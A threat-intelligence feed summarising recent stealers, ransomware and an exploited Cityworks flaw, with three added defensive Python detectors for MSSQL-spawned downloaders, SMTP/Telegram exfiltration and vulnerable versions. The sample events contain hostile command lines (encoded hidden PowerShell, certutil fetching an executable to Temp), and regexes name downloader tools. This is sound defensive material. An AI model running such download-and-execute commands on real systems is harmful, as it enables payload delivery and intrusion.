LATEST THREAT INTELLIGENCE.

SVC New Stealer on the Horizon

Description: SvcStealer 2025 is a newly discovered information stealer malware distributed through spear phishing emails. It targets sensitive data including machine information, installed software, user credentials, cryptocurrency wallets, and browser data. The malware creates a unique folder, terminates specific processes, and harvests data from various sources. It compresses the collected information and sends it to a command and control server. The malware can also download additional payloads and implements evasion techniques. It targets multiple browsers, messaging applications, and specific file types. The campaign was observed in late January 2025, with the threat actors potentially selling the stolen data on underground forums and marketplaces.

Created at: 2025-03-21T18:47:00.218000

Updated at: 2025-03-24T13:44:53.692000

VanHelsing: New RaaS in Town

Description: VanHelsing RaaS, a new ransomware-as-a-service program launched on March 7, 2025, has quickly gained traction in the cybercrime world. With a low $5,000 deposit for affiliates, it offers an 80% cut of ransom payments. The service provides a user-friendly control panel and targets multiple platforms, including Windows, Linux, BSD, ARM, and ESXi systems. Within two weeks of its launch, VanHelsing infected three victims, demanding large ransoms. The ransomware, written in C++, is actively evolving, with two variants discovered just five days apart. It employs various techniques to evade detection, including a 'Silent' mode and selective encryption of files. The rapid growth and sophistication of VanHelsing RaaS highlight the increasing threat of ransomware attacks.

Created at: 2025-03-23T15:40:51.431000

Updated at: 2025-03-24T13:38:17.277000

Lumma Stealer Malware Thrives as Unique Patterns Uncovered in the Infostealer's Domain Clusters

Description: Recent research reveals Lumma Stealer command and control domain clusters share specific technical characteristics, enabling mapping of entire infrastructure clusters. The infostealer's logs are being shared for free on Leaky[.]pro, a new hacking forum, offering billions of stolen credential records. There's an alarming increase in malware spread via malicious YouTube links and infected files disguised in videos, comments, or descriptions. Lumma Stealer infections typically enable more extensive attacks, including ransomware deployment and espionage operations. The malware targets multiple Windows versions, stealing sensitive information like login credentials, browser data, chat logs, and cryptocurrency wallet details. Distribution methods include malvertising on popular search engines and malspam with harmful attachments. Threat actors register clusters of 10-20 domains at a time, some used immediately while others age for up to two weeks.

Created at: 2025-02-22T00:33:07.065000

Updated at: 2025-03-24T00:02:52.734000

LightSpy Malware Now Targets Facebook & Instagram Data

Description: LightSpy, a modular surveillance framework, has expanded its capabilities to target Facebook and Instagram data. The malware, initially focused on mobile devices, now compromises Windows, macOS, Linux, and routers. Recent analysis reveals a significant expansion in its command list, with over 100 commands spanning multiple platforms. New Android commands specifically target Facebook and Instagram database files, potentially allowing attackers to collect private messages, contact lists, and account metadata. The infrastructure analysis uncovered previously unreported components, including a core version dated 2021-12-31. Windows plugins focus on keylogging, audio recording, video capture, and USB interaction. The exposure of admin panel authentication endpoints provides insights into the malware's operational framework.

Created at: 2025-02-21T15:28:00.106000

Updated at: 2025-03-23T15:02:20.895000

Targeting of freelance developers

Description: North Korea-aligned cybercriminals are targeting freelance software developers through fake job offers and coding challenges containing malware. The campaign, dubbed DeceptiveDevelopment, uses two main malware families - BeaverTail and InvisibleFerret - to steal cryptocurrency wallets and login credentials. Attackers pose as recruiters on platforms like LinkedIn and GitHub, providing trojanized projects as part of fake interview processes. The malware steals browser data, cryptocurrency wallets, and system information, and can deploy remote access tools. Hundreds of victims globally have been observed across Windows, Linux and macOS systems. The operation shows increasing sophistication and is expected to continue evolving its tactics to target cryptocurrency users.

Created at: 2025-02-21T05:58:33.035000

Updated at: 2025-03-23T05:00:15.187000

BlackBasta ransomware

Description: Members of the Conti ransomware group appear to have splintered into multiple threat groups including BlackBasta, which has become one of the most significant ransomware threats. ThreatLabz has observed more than five victims that have been compromised by BlackBasta 2.0 since the new version’s release in mid-November 2022. This demonstrates that the threat group is very successful at compromising organizations and the latest version of the ransomware will likely enable them to better evade antivirus and EDRs.

Created at: 2022-12-02T12:22:12.999000

Updated at: 2025-03-23T00:03:10.218000

Stately Taurus Activity in Southeast Asia Links to Bookworm Malware

Description: Unit 42 researchers have discovered connections between Stately Taurus, a threat actor targeting ASEAN countries, and the Bookworm malware family. Analysis of infrastructure and code overlaps revealed links between recent Stately Taurus attacks and Bookworm samples dating back to 2015. The group has been using both Bookworm and ToneShell malware in their operations. Bookworm has undergone minimal changes since 2015, demonstrating its versatility and continued effectiveness. The malware's modular design allows for flexible packaging to meet operational needs. Stately Taurus is expected to continue developing and utilizing Bookworm in future attacks targeting Southeast Asian organizations.

Created at: 2025-02-20T19:47:44.548000

Updated at: 2025-03-22T19:01:55.704000

Demystifying PKT and Monero Cryptocurrency deployed on MSSQL servers

Description: This analysis examines a recent cryptocurrency mining operation targeting MSSQL servers, focusing on PKT Classic and Monero cryptocurrencies. The attack exploits vulnerabilities to deploy mining tools, including PacketCrypt for PKT and XMRIG for Monero. The process involves using Windows utilities and PowerShell scripts to download and execute malicious files. The miners consume significant system resources, potentially degrading performance and causing hardware wear. The attackers utilize GitHub repositories, obfuscation techniques, and multi-stage attacks to evade detection. The article provides details on the attack chain, wallet information, and file analysis, highlighting the sophisticated nature of the operation. Mitigation strategies include regular software updates, strong authentication measures, and robust antivirus protection.
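The summary above describes the mining operation's execution chain (SQL server process launching Windows utilities and PowerShell to fetch payloads, including from GitHub) but not how a defender would catch it. The following is an added detection example, not code from the referenced analysis: it scans process-creation events for a database engine process spawning a download-capable LOLBin. The event line format, the list of suspicious child processes and the command-line patterns are assumptions for illustration; the sample events are constructed, not real telemetry from the campaign.

```python
"""Flag MSSQL-spawned download-and-execute activity from process-creation events.

Added example, not from the original report. Assumes a simplified,
constructed event format: 'parent_image|child_image|command_line' per line.
"""
import re

# Windows utilities commonly abused as downloaders/launchers. Assumption: the
# report names "Windows utilities and PowerShell scripts" but not which ones.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "wscript.exe", "cscript.exe", "curl.exe",
}

# Command-line fragments that indicate remote download or encoded execution.
DOWNLOAD_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr\b|wget\b|curl\b", re.I),
    re.compile(r"certutil.*-urlcache", re.I),
    re.compile(r"bitsadmin.*/transfer", re.I),
    re.compile(r"-enc(odedcommand)?\s", re.I),  # base64-encoded script body
    re.compile(r"https?://(raw\.)?github(usercontent)?\.com/", re.I),  # hosting named in the report
]


def parse_event(line):
    """Split 'parent|child|cmdline' into a dict; returns None for malformed lines."""
    parts = line.strip().split("|", 2)
    if len(parts) != 3:
        return None
    parent, child, cmdline = parts
    return {
        "parent": parent.rsplit("\\", 1)[-1].lower(),  # image name only
        "child": child.rsplit("\\", 1)[-1].lower(),
        "cmdline": cmdline,
    }


def classify(event):
    """Return 'high', 'medium' or None for one event.

    high   - sqlservr.exe spawned a LOLBin whose command line downloads or decodes
    medium - sqlservr.exe spawned a LOLBin at all (xp_cmdshell-style execution)
    """
    if event["parent"] != "sqlservr.exe":
        return None
    if event["child"] not in SUSPICIOUS_CHILDREN:
        return None
    if any(p.search(event["cmdline"]) for p in DOWNLOAD_PATTERNS):
        return "high"
    return "medium"


def scan(lines):
    """Return a list of (severity, child_image, cmdline) for events that fire."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        sev = classify(ev)
        if sev:
            hits.append((sev, ev["child"], ev["cmdline"]))
    return hits


# Constructed sample events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    r"C:\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA",
    r"C:\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f https://raw.githubusercontent.com/example/repo/main/x.exe C:\Windows\Temp\x.exe",
    r"C:\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\whoami.exe|whoami",  # not a download-capable child
    r"C:\MSSQL\Binn\sqlservr.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir C:\backups",  # medium: no download
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Invoke-WebRequest https://example.org",  # wrong parent
    "garbage line without separators",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The lineage check is the part that matters: a SQL engine process has no business launching certutil or an encoded PowerShell command, regardless of what the payload turns out to be, so the rule keeps firing when the miner binary or the GitHub repository changes.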

Created at: 2025-02-20T13:44:21.193000

Updated at: 2025-03-22T13:01:31.822000

Evolving Snake Keylogger Variant

Description: A new variant of Snake Keylogger, identified as AutoIt/Injector.GTY!tr, has been detected by FortiSandbox v5.0. This malware has attempted over 280 million infections, primarily targeting China, Turkey, Indonesia, Taiwan, and Spain. Snake Keylogger steals sensitive information from popular web browsers by logging keystrokes, capturing credentials, and monitoring the clipboard. It exfiltrates data to its command-and-control server using SMTP and Telegram bots. FortiSandbox's advanced AI engine, PAIX, detected the malware through static and dynamic analysis, revealing its use of AutoIt for obfuscation, process hollowing techniques, and persistence mechanisms. The keylogger also employs specialized modules to steal credit card details and leverages the SetWindowsHookEx API for keystroke capture.
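The two exfiltration channels named above, SMTP and Telegram bots, are both visible at the network edge. The block below is an added example, not code from the Fortinet report: it runs over egress log lines and flags SMTP connections from processes that are not mail clients, plus calls to the Telegram Bot API from any process. The log line format, the mail-client allowlist and the sample lines are constructed assumptions; the bot-token shape in the regex follows the public Bot API convention of `<numeric id>:<token string>`.

```python
"""Spot keylogger-style exfiltration over SMTP and the Telegram Bot API.

Added example, not part of the original report. Assumes a constructed
egress log format: 'process,dest_host,dest_port,url_path' per line.
"""
import re
from collections import defaultdict

SMTP_PORTS = {25, 465, 587}
# Processes that legitimately speak SMTP; everything else doing so is suspect.
# Assumption: tune this allowlist to your own estate.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Bot API calls look like /bot<id>:<token>/<method>. Tokens are typically
# 35 characters after the colon; the lower bound keeps the match tolerant.
TELEGRAM_BOT_CALL = re.compile(
    r"^/bot(\d+:[A-Za-z0-9_-]{30,})/(sendMessage|sendDocument|sendPhoto)"
)


def parse_line(line):
    """Return a record dict, or None for malformed lines or bad ports."""
    fields = line.strip().split(",", 3)
    if len(fields) != 4:
        return None
    proc, host, port, path = fields
    try:
        port = int(port)
    except ValueError:
        return None
    return {"process": proc.lower(), "host": host.lower(), "port": port, "path": path}


def classify(rec):
    """Return (reason, detail) or None."""
    if rec["host"] == "api.telegram.org":
        m = TELEGRAM_BOT_CALL.match(rec["path"])
        if m:
            # Redact the secret part: only the numeric bot id is useful to responders.
            bot_id = m.group(1).split(":")[0]
            return ("telegram-bot-exfil", f"{rec['process']} -> bot {bot_id} {m.group(2)}")
        return ("telegram-api", rec["process"])
    if rec["port"] in SMTP_PORTS and rec["process"] not in MAIL_CLIENTS:
        return ("smtp-from-non-mail-client", f"{rec['process']} -> {rec['host']}:{rec['port']}")
    return None


def scan(lines):
    """Group findings by reason: {reason: [detail, ...]}."""
    findings = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            findings[hit[0]].append(hit[1])
    return dict(findings)


# Constructed sample log; process names and hosts are illustrative only.
SAMPLE_LOG = [
    "outlook.exe,smtp.office365.com,587,",
    "svchost_update.exe,smtp.gmail.com,587,",  # non-mail-client process speaking SMTP
    "regsvcs.exe,api.telegram.org,443,/bot123456789:" + "A" * 35 + "/sendDocument",
    "chrome.exe,web.telegram.org,443,/",  # user browsing Telegram Web, not a bot call
    "notepad.exe,api.telegram.org,443,/",  # Bot API host but no bot-call path
    "broken,line",
]

if __name__ == "__main__":
    for reason, details in scan(SAMPLE_LOG).items():
        print(reason, details)
```

Matching on the `/bot<id>:<token>/` path, rather than only on the host, separates bot-driven uploads from a user with Telegram open in a browser; logging only the numeric id avoids copying a live bot token into the alert.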

Created at: 2025-02-20T08:49:08.190000

Updated at: 2025-03-22T08:00:57.500000

Trimble Cityworks: CVE-2025-0994: Active Exploitation

Description: A high-severity deserialization vulnerability in Trimble Cityworks, CVE-2025-0994, affects versions before 15.8.9 and Office Companion versions before 23.10. This flaw allows authenticated attackers to execute remote code on Microsoft IIS web servers. Exploitation indicators suggest the use of Rust-based loaders to deploy VShell and Cobalt Strike. Malicious files, including obfuscated JavaScript and executables, were likely downloaded from Cobalt Strike C2 servers. Shodan reveals 111 exposed Cityworks instances, with 21% vulnerable. The majority are in the US, including .gov domains. Organizations are urged to upgrade to patched versions immediately, as CISA has added this CVE to their Known Exploited Vulnerabilities Catalog.
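The affected-version thresholds above (Cityworks before 15.8.9, Office Companion before 23.10) are exactly the kind of check that goes wrong when versions are compared as strings ("23.9" sorts after "23.10" lexically). The following is an added triage example, not code from the advisory or from Trimble: it parses version strings numerically, pads shorter versions with zeros, and reports which inventory entries still need the upgrade. The inventory format and host names are constructed assumptions.

```python
"""Triage an inventory against the CVE-2025-0994 fixed versions.

Added example, not from the advisory. Fixed versions as stated in the summary:
Cityworks 15.8.9 and Office Companion 23.10; anything lower is affected.
The inventory layout is a constructed assumption.
"""
import re

FIXED = {
    "cityworks": (15, 8, 9),
    "office_companion": (23, 10),
}


def parse_version(s):
    """'15.8.9', '15.10', 'v15.8.9-hotfix2' -> tuple of ints.

    Numeric rather than lexical, so 15.10.x correctly sorts above 15.8.9.
    """
    m = re.match(r"v?(\d+(?:\.\d+)*)", s.strip())
    if not m:
        raise ValueError(f"unparseable version: {s!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def pad(t, n):
    """Right-pad a version tuple with zeros so '15.8' compares as 15.8.0."""
    return t + (0,) * (n - len(t))


def is_vulnerable(product, version):
    """True when the installed version is below the fixed version for that product."""
    fixed = FIXED[product]
    v = parse_version(version)
    n = max(len(v), len(fixed))
    return pad(v, n) < pad(fixed, n)


def triage(inventory):
    """inventory: list of (host, product, version). Returns entries needing upgrade."""
    return [(h, p, ver) for h, p, ver in inventory if is_vulnerable(p, ver)]


# Constructed inventory for illustration.
INVENTORY = [
    ("cw-app-01", "cityworks", "15.8.8"),
    ("cw-app-02", "cityworks", "15.8.9"),
    ("cw-app-03", "cityworks", "15.10.1"),
    ("cw-app-04", "cityworks", "15.8"),  # fewer components: treated as 15.8.0
    ("cw-ws-07", "office_companion", "23.9"),
    ("cw-ws-08", "office_companion", "23.10"),
]

if __name__ == "__main__":
    for host, product, version in triage(INVENTORY):
        print(f"{host}: {product} {version} needs upgrade")
```

Because the vulnerability requires authentication and the observed follow-on is Cobalt Strike and VShell, hosts this check flags should also be reviewed for the loader and C2 indicators the advisory describes, not just patched.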

Created at: 2025-02-20T02:49:24.532000

Updated at: 2025-03-22T02:01:39.509000